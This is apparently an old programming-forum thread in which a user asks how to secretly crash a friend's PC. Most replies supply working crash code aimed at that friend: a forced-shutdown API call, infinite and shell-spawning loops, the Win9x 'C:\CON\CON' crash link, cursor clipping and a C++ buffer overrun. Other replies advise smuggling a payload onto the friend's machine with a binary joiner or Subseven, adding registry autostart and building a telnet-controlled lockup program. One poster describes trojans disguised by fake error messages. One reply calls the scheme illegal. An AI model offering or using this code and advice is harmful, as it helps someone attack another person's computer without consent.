Results 1 to 29 of 29

Thread: how do I crash the users pc

  1. #1

    Thread Starter
    Frenzied Member
    Join Date
    Jun 2000
    Location
    East Providence, RI
    Posts
    1,715
    I want to know how to crash the users pc, I dont want to delete any files, but I dont want an error message to come up eaither


    will this work:


    do
    dim a as currency
    a = a * 2
    loop until error
    NXSupport - Your one-stop source for computer help

  2. #2
    Guest
    Why do you want to crash the users PC?

  3. #3

    Thread Starter
    Frenzied Member
    Join Date
    Jun 2000
    Location
    East Providence, RI
    Posts
    1,715
    becuase my friend gets annoying sometimes so I can directly connect (thorugh hacking software) and send him the file, then send him an im with a link to the file on his hard drive. and becuase I want to make it so that when I start my computer, I give my self 1 minute to enter a password, if I dont then the computer will crash, so noone else can use my computer with out my permission, and if they do, they loose all there un saved files
    NXSupport - Your one-stop source for computer help

  4. #4
    Guru Yonatan's Avatar
    Join Date
    Apr 1999
    Location
    Israel
    Posts
    892
    Poor friend!
    Code:
    Private Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long
    
    Private Const EWX_SHUTDOWN = 1
    Private Const EWX_FORCE = 4
    
    Sub ForceTheComputerToShutDownWithoutTellingAnyOfTheCurrentlyRunningProgramsToDoTheirVariousUnloadAndQueryUnloadEvents()
        Call ExitWindowsEx(EWX_SHUTDOWN Or EWX_FORCE, 0)
    End Sub
    Simple, just use this line:
    Call ForceTheComputerToShutDownWithoutTellingAnyOfTheCurrentlyRunningProgramsToDoTheirVariousUnloadAndQue ryUnloadEvents

  5. #5

    Thread Starter
    Frenzied Member
    Join Date
    Jun 2000
    Location
    East Providence, RI
    Posts
    1,715
    also, do any of you know programs that I can use to send him the file? (without him knowing) becuase I got his ip
    NXSupport - Your one-stop source for computer help

  6. #6
    Guru Yonatan's Avatar
    Join Date
    Apr 1999
    Location
    Israel
    Posts
    892
    You can't, he has to run a program which will receive the file.

  7. #7
    Lively Member
    Join Date
    Apr 2000
    Posts
    110

    Exclamation Shutdown

    Just shutdown windows using the ExitWindowsEx API call.

    Later

    REM
    "Innovate, don't immitate."

  8. #8

    Thread Starter
    Frenzied Member
    Join Date
    Jun 2000
    Location
    East Providence, RI
    Posts
    1,715
    oh that sucks, do you know of any programs that do that?
    NXSupport - Your one-stop source for computer help

  9. #9
    Fanatic Member
    Join Date
    Apr 2000
    Location
    Whats a location?
    Posts
    516
    Make a C++ file where an array is declared to have, say 2 elements. Then add data as if the array had 2000 elements. (C++ doesn't have array bounds checks ) That'll screw it up rudely, not close it down politely
    Courgettes.

  10. #10

    Thread Starter
    Frenzied Member
    Join Date
    Jun 2000
    Location
    East Providence, RI
    Posts
    1,715
    I know as much about c++ as you know about assembler (unless you know assembler) I think that its getting (V)ery Complicated
    NXSupport - Your one-stop source for computer help

  11. #11
    Frenzied Member
    Join Date
    Jul 1999
    Posts
    1,800
    You can make a program to recieve the file...getting it on your friends computer is another thing, (send it hidden with another file, like a pic you want to show him) then you can have it always run, so it can accept your file. BTW: Ip addresses change unless he is on a cable modem.

  12. #12

    Thread Starter
    Frenzied Member
    Join Date
    Jun 2000
    Location
    East Providence, RI
    Posts
    1,715
    actually they dont change, its only if he's on aol it changes becuase aol has this saftey software that always changes it
    NXSupport - Your one-stop source for computer help

  13. #13
    Fanatic Member
    Join Date
    Jun 1999
    Location
    California, USA
    Posts
    662
    Just make a program to put on his computer (link to it in the regiistry so it starts up w/ win) and have it respond to telnet messages. If you send the "l" message, it lockup the computer, and "u" un-lockups it.

    there are several different ways to crash the computer:

    Code:
    Do
        'Nothing in between the Do and Loop will effectively lock up the computer.
    Loop
    Code:
    Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
    Call ShellExecute(me.hwnd,"Open","c:\con\con", vbnullstring, app.path,0)
    Code:
    Declare Function SetParent Lib "user32" Alias "SetParent" (ByVal hWndChild As Long, ByVal hWndNewParent As Long) As Long
    Declare Function GetDesktopWindow Lib "user32" Alias "GetDesktopWindow" () As Long
    Call SetParent(GetDesktopWindow,me.hwnd)
    This one simulates a lockup:
    Code:
    Declare Function ClipCursor Lib "user32" Alias "ClipCursor" (lpRect As Any) As Long
    Type RECT
            Left As Long
            Top As Long
            Right As Long
            Bottom As Long
    End Type
    
    Dim a as rect
    a.top = 0
    a.left = 0
    a.right = 0
    a.bottom = 0
    
    Call ClipCursor(a)

  14. #14
    Guest
    A good way to crash a computer is to Shell a few things a few times. I am almost sure it will work.

    Code:
    Do
    Shell "C:\Windows\Explorer.exe"
    Shell "Command.com"
    DoEvents
    Loop
    And if you have his IP, you can actually freeze his computer, delete files, run files, and a few other things, I saw an example on http://www.planet-source-code.com of how to do it, don't remember what it was called, but try searching "IP" and "Winsock".

    Hope that helps.

  15. #15
    New Member The Riddler's Avatar
    Join Date
    Aug 2000
    Location
    Gotham City
    Posts
    13

    Red face

    Yes, your right Denniswren....

    Sincere apologies


    [Edited by The Riddler on 08-25-2000 at 09:28 PM]
    I've seen your mind, Freak

  16. #16
    Guest
    wow your a dick outside of the chitchat forum too!
    take that down, or john Will he did it about 3 times before,

    and not to be a party pooper here, but what you guys wanna do is illegal, because you are accesiing another persons computer without their permission.

  17. #17

    Thread Starter
    Frenzied Member
    Join Date
    Jun 2000
    Location
    East Providence, RI
    Posts
    1,715
    I'm saving this page before john delete's it
    NXSupport - Your one-stop source for computer help

  18. #18
    New Member
    Join Date
    Aug 2000
    Location
    Austria
    Posts
    9

    Talking crash

    if you have win9x

    link to -> "file://C:/CON/CON"
    cool way to crash a computer!

    file://C:/CON/CON

  19. #19
    Fanatic Member
    Join Date
    Apr 2000
    Location
    Whats a location?
    Posts
    516
    That C++ file...

    Code:
    int main()
    {
        int CrashArr[1];
        int i;
        //Sets 2.4 MBs of memory to 0
        for (i=0; i < 600000; i++)
    	CrashArr[i] = 0;
        //Not that it's going to get here, but...
        return 0;
    }

    Haven't tested it yet, but I will now.


    Courgettes.

  20. #20
    Fanatic Member
    Join Date
    Apr 2000
    Location
    Whats a location?
    Posts
    516
    [/i]
    Damn, the forum screwed that post up.

    You see, on the line where is says CrashArr = 0, it should be:

    (without the @s)

    CrashArr[@i@] = 0
    Courgettes.

  21. #21
    I'm about to be a PowerPoster! Joacim Andersson's Avatar
    Join Date
    Jan 1999
    Location
    Sweden
    Posts
    14,649
    Originally posted by V(ery) Basic
    Make a C++ file where an array is declared to have, say 2 elements. Then add data as if the array had 2000 elements. (C++ doesn't have array bounds checks ) That'll screw it up rudely, not close it down politely
    You could do that in VB as well just check the "Remove Array Bound Checks" checkbox in the Advanced Optimizations dialog box. But this will not crash Windows, only your own application because all apps are run in protected memory areas.

  22. #22
    Fanatic Member
    Join Date
    Apr 2000
    Location
    Whats a location?
    Posts
    516
    I just ran the app I posted...

    It froze the computer completely .. no BSOD ... Ctrl+Alt+Del didn't do anything. Had to restart by pressing the restart button.

    Really good crash.

    This is what C++ is for

    I can send the app to you, dimava, if you want.
    Courgettes.

  23. #23
    I'm about to be a PowerPoster! Joacim Andersson's Avatar
    Join Date
    Jan 1999
    Location
    Sweden
    Posts
    14,649
    Hmmmm... You must be running Windows 95 because when I tested this on my WinNT 4.0 mashine doctor Watson just kicked the program out.

  24. #24

    Thread Starter
    Frenzied Member
    Join Date
    Jun 2000
    Location
    East Providence, RI
    Posts
    1,715
    I'll be honnost wih you guy, I didn't read all the posts or tried any of the code but as soon as I get a chance, I'll try it all out and let you know if it worked or not
    NXSupport - Your one-stop source for computer help

  25. #25
    Addicted Member Cbomb's Avatar
    Join Date
    Jul 1999
    Posts
    153

    Talking Getting in

    --The following is for educational purposes only! I take no responsibility...(yadda yadda)--

    As for getting the file into his computer you can try a binary joiner. One exe has 2 programs codes in it...One is some lame animation etc...the other is your file which writes it self into win.ini under "[run]" or something.

    Or some thing like Subseven. But you still need the server file on his computer.

    Have fun...
    Cbomb
    Techie

  26. #26
    Fanatic Member
    Join Date
    Apr 2000
    Location
    Whats a location?
    Posts
    516
    Originally posted by Joacim Andersson
    Hmmmm... You must be running Windows 95 because when I tested this on my WinNT 4.0 mashine doctor Watson just kicked the program out.
    Yeah, I am running Win 95.

    NT must be much safer.

    Who is this Dr. Watson? I'd like to get my hands on him...
    Courgettes.

  27. #27
    Fanatic Member
    Join Date
    Jun 1999
    Location
    California, USA
    Posts
    662

    Re: Getting in

    Originally posted by Cbomb
    --The following is for educational purposes only! I take no responsibility...(yadda yadda)--

    As for getting the file into his computer you can try a binary joiner. One exe has 2 programs codes in it...One is some lame animation etc...the other is your file which writes it self into win.ini under "[run]" or something.

    Or some thing like Subseven. But you still need the server file on his computer.

    Have fun...
    That would be called a trojen. I have written stuff like this before. Actually, my trojens just give an error message "ActiveX component can't create object", unless it's run with a /s on the commandline (hint...)

  28. #28
    Monday Morning Lunatic parksie's Avatar
    Join Date
    Mar 2000
    Location
    Mashin' on the motorway
    Posts
    8,169
    Dr Watson is the NT bad program logger, which keeps track of which programs have either been naughty or crashed. Sorry, but to crash NT you'll need a bit more skill
    I refuse to tie my hands behind my back and hear somebody say "Bend Over, Boy, Because You Have It Coming To You".
    -- Linus Torvalds

  29. #29
    I'm about to be a PowerPoster! Joacim Andersson's Avatar
    Join Date
    Jan 1999
    Location
    Sweden
    Posts
    14,649
    Originally posted by parksie
    Dr Watson is the NT bad program logger, which keeps track of which programs have either been naughty or crashed. Sorry, but to crash NT you'll need a bit more skill
    Yupp! Dr Watson always keeps poping up on my mashine, but I think that to crash a computer running NT (and one that is configured the right way) you need more than skills

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  



Click Here to Expand Forum to Full Width